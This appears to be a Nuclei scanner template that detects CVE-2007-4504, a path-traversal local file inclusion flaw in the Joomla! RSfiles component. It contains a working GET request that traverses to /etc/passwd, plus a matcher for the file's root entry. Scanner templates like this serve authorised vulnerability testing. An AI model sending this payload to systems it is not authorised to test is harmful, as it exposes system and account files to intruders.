36 lines
1.1 KiB
YAML
36 lines
1.1 KiB
YAML
|
id: CVE-2007-4504
|
||
|
|
||
|
info:
|
||
|
name: Joomla! RSfiles <=1.0.2 - Local File Inclusion
|
||
|
author: daffainfo
|
||
|
severity: high
|
||
|
description: Joomla! RSfiles 1.0.2 and earlier is susceptible to local file inclusion in index.php in the RSfiles component (com_rsfiles). This could allow remote attackers to arbitrarily read files via a .. (dot dot) in the path parameter in a files.display action.
|
||
|
reference:
|
||
|
- https://www.exploit-db.com/exploits/4307
|
||
|
- https://exchange.xforce.ibmcloud.com/vulnerabilities/36222
|
||
|
- https://nvd.nist.gov/vuln/detail/CVE-2007-4504
|
||
|
classification:
|
||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
||
|
cvss-score: 8.6
|
||
|
cve-id: CVE-2007-4504
|
||
|
cwe-id: CWE-22
|
||
|
tags: lfi,edb,cve,cve2007,joomla
|
||
|
|
||
|
http:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}/index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd"
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
|
||
|
- type: regex
|
||
|
regex:
|
||
|
- "root:.*:0:0:"
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|
||
|
|
||
|
# Enhanced by mp on 2022/07/06
|